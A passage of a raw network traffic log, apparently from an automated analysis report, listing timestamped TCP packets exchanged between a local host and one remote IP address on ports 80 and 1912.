                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.011018991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.011771917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.011822939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.011842012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.012762070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.012810946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.013714075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015213013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015256882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015292883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015305996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015325069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015336990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015351057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015357018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.015397072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.016211987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.016223907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.016259909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.016987085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.017030001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.017162085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.017776966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.017855883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.017934084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.018601894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.018645048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.018785954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.019440889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.019484997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.019613981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.020385027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.020508051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.020541906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.021100998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.021112919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.021157980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.022037983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.022051096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.022089958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.022595882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.022711992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.022721052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.023466110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.023521900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.023670912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.024413109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.024460077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.024492025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.034987926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.035041094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.035264015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.035424948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.035604000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.035619020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.036144972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.036195993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.036293983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.037000895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.037056923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.038652897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.038764000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.038830042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.039094925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.039186001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.039233923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.039872885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.040090084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.040179014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.040230036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.040780067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.040832996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.040860891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.041415930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.041465044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.041506052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.042185068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.042229891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.042264938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.042963028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.043004990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.077301979 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.092094898 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.181963921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.181994915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.182045937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.182296991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.182526112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.182570934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.183156967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.183337927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.183377981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.183945894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.184060097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.184104919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.184811115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.184881926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.184935093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.185626030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.185736895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.185781002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.186451912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.186558008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.186598063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.187299013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.187510967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.187552929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.188349009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.188532114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.188570976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.189008951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.189076900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.189131021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.189842939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.189929962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.189973116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.190639973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.190742970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.190790892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.191463947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.191581964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.191625118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.192333937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.192395926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.192435026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.193135977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.193226099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.193268061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.193967104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.194053888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.194099903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.194844961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.194904089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.194946051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.195638895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.195739031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.195779085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.196455002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.196583033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.196630955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.197288990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.197424889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.197468042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.198138952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.198230982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.198277950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.198959112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.199059963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.199105978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.199841022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.199944019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.199997902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.200659990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.200705051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.200745106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.201520920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.201596022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.201653957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.202302933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.202418089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.202459097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.203138113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.203208923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.203248978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.203994989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.204081059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.204127073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.204811096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.204909086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.204952002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.205681086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.205712080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.205756903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.206690073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.206763983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.206805944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.207406998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.207493067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.207531929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.208220959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.208312035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.208354950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.209032059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.209157944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.209202051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.209815979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.209930897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.209973097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.210617065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.210760117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.210805893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.211525917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.211621046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.211678982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.211746931 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.212305069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.212420940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.212471962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.213143110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.213249922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.213303089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.213968039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.214067936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.214113951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.214811087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.214907885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.214946032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.215630054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.215789080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.215833902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.216484070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.216667891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.216720104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.217292070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.227791071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.227835894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.227897882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.228182077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.228223085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.228303909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.229208946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.229254961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.229387045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.230319977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.230367899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.231348038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.231462002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.231509924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.231636047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.231699944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.231738091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.232171059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.232265949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.232326031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.232738972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.232825041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.232865095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.233355999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.233395100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.233439922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.233941078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.234049082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.234097958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.234800100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.234906912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.234947920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.235742092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.235797882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.235826969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.356499910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.494141102 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.525876999 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.571439981 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.614057064 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.614144087 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.614217043 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.680892944 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.734190941 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.800957918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.114129066 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.165188074 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943092108 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943159103 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943274021 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943273067 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943372011 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943403006 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943416119 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943458080 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943492889 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943536997 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943594933 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943645954 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943655014 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943690062 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943732023 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.063641071 CET8049713185.81.68.147192.168.2.8
